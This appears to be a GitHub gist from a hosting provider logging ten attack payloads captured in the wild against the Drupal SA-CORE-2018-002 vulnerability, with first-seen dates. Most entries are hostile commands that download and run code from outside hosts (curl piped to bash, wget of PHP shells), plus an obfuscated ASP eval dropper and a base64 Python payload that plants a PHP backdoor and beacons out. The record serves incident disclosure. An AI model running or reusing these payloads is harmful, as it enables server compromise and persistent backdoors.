Skip to content

Instantly share code, notes, and snippets.

@Schnitzel Schnitzel/attacks.md
Last active Apr 16, 2018

Embed
What would you like to do?
Drupal SA-CORE-2018-002 attacks

Drupal SA-CORE-2018-002 attacks on amazee.io

Attack 1

First seen: April 13th 2018, 12:54:06

Array Key: #markup

Array Value:

curl -o config.php http://havio.pl/themes/themes.css

Attack 2

First seen: April 13th 2018, 04:07:38

Array Key: #markup

Array Value:

curl -s http://158.69.133.18:8220/logo8.jpg | bash -s

Attack 3

First seen: April 9th 2018, 02:07:00 UTC

Array Key: #

Array Value:

eval("Ex"&cHr(101)&"cute(""Server.ScriptTimeout=3600:On Error Resume Next:Function bd(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute(""""bd=bd&chr(&H""""&c&"""")""""):Else:Execute(""""bd=bd&chr(&H""""&c&Mid(s,i+2,2)&"""")""""):i=i+2:End If""&chr(10)&""Next:End Function:Response.Write(""""->|""""):Ex"&cHr(101)&"cute(""""On Error Resume Next:""""&bd(""""44696D20533A53455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A496620457272205468656E3A533D224552524F523A2F2F2022264572722E4465736372697074696F6E3A4572722E436C6561723A456C73653A533D5365727665722E4D61707061746828222E2229266368722839293A466F722045616368204420696E20432E4472697665733A533D5326442E44726976654C657474657226636872283538293A4E6578743A456E642049663A526573706F6E73652E5772697465285329"""")):Response.Write(""""|<-""""):Response.End"")")

Attack 4

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

wget http://37.1.206.18/pingpongx?host=www.domain.com -O /dev/null

Attack 5

First seen: April 12th 2018, 18:26:52 UTC

Array Key: #markup

Array Value:

echo "ahcBmgweGC"

Attack 6

First seen: April 12th 2018, 23:38:53 UTC

Array Key: #markup

Array Value:

python -c 'exec("aW1wb3J0IG9zLHJhbmRvbSx1cmxsaWIyCkk9Wyd2ZW5kb3IvYXV0b2xvYWQucGhwJywndmVuZG9yL2NvbXBvc2VyL2F1dG9sb2FkX3JlYWwucGhwJywnY29yZS9pbmNsdWRlcy9ib290c3RyYXAuaW5jJywnYXV0b2xvYWQucGhwJywnaW5kZXgucGhwJ10KZD0nZXh0cmFjdCgkX1JFUVVFU1QpO2lmKGlzc2V0KCR1eGEsJHV4YikpeyR1eGEoJHV4Yik7ZXhpdDt9Jwp3PSJpZigkX1JFUVVFU1RbJ3EnXSE9J2Y5ODhiM2ZmZDZmZGRjYjk1NmViYWU4Njc2ZmJhMDdkJyl7ZnVuY3Rpb24gdWdmcWxxZWwoJGEpe2ZvcmVhY2goJGEgYXMkaz0+JHYpe2lmKGlzX2FycmF5KCR2KSkkYVska109dWdmcWxxZWwoJHYpO2lmKCRrWzBdPT0nIycpdW5zZXQoJGFbJGtdKTt9cmV0dXJuICRhO307JF9HRVQ9dWdmcWxxZWwoJF9HRVQpOyRfUE9TVD11Z2ZxbHFlbCgkX1BPU1QpO31lbHNleyIrZCsifSIKdT0nMCcKdD0wCmZvciBmbiBpbiBJOgogaWYgb3MuYWNjZXNzKGZuLG9zLldfT0spOgogIHQ9b3MucGF0aC5nZXRtdGltZShmbikKICBkeD1vcGVuKGZuKS5yZWFkKCkucmVwbGFjZSgnPD9waHAnLCc8P3BocFxuJyt3LDEpCiAgb3BlbihmbiwndycpLndyaXRlKGR4KQogIG9zLnV0aW1lKGZuLCh0KzEsdCsxKSkKICB1PScxJwogIGJyZWFrClQ9RmFsc2UKZm49Jycuam9pbihyYW5kb20uY2hvaWNlKCdhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eicpZm9yIF8gaW4gcmFuZ2UoOCkpKycucGhwJwpmb3IgeCBpbltmbiwnY29yZS8nK2ZuXToKIHRyeToKICBvcGVuKHgsJ3cnKS53cml0ZSgnPD9waHAgJytkKQogIG9zLnV0aW1lKGZuLCh0LHQpKQogIFQ9VHJ1ZQogZXhjZXB0OgogIHBhc3MKaWYgbm90IFQ6CiBmbj0nJwp1cmxsaWIyLnVybG9wZW4oImh0dHA6Ly84MC4yMDkuMjUzLjUxLz9oPXd3dy5yaWNvYmFsZGVnZ2VyLmNoOnt9Ont9Ii5mb3JtYXQodSxmbiksdGltZW91dD01KS5yZWFkKCk=".decode("base64"))'; curl -s 'http://80.209.253.51/?d=www.domain.com' >/dev/null; wget 'http://80.209.253.51/?d=www.domain.com' -O /dev/null

Attack 7

First seen:April 13th 2018, 02:29:26 UTC

Array Key: #markup

Array Value:

curl -s 'http://80.209.253.51/?d=www.domain.com' >/tmp/mjs.py; wget 'http://80.209.253.51/?d=www.domain.com' -O /tmp/mjs.py; python /tmp/mjs.py

Attack 8

First seen: April 13th 2018, 06:35:41 UTC

Array Key: #markup

Array Value:

curl -o rhRfU.php http://mmsubtitles.co/fonts/aril.ttf

Attack 9

First seen: April 13th 2018, 20:18:30

Array Key: #markup

wget -O m.php http://wp.startreceive.tk/test/z/m.txt;chmod 777 /tmp/m.php;sed -i 's/ptptpt/"\/home\/bpw\/public_html\/"/g' /tmp/m.php;php -f /tmp/m.php;rm -f /tmp/m.php

Attack 10

First seen: April 13th 2018, 20:00:29

Array Key: #markup

wget -O /dev/null http://146.185.136.136/knock.php?target=http://domain.com/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.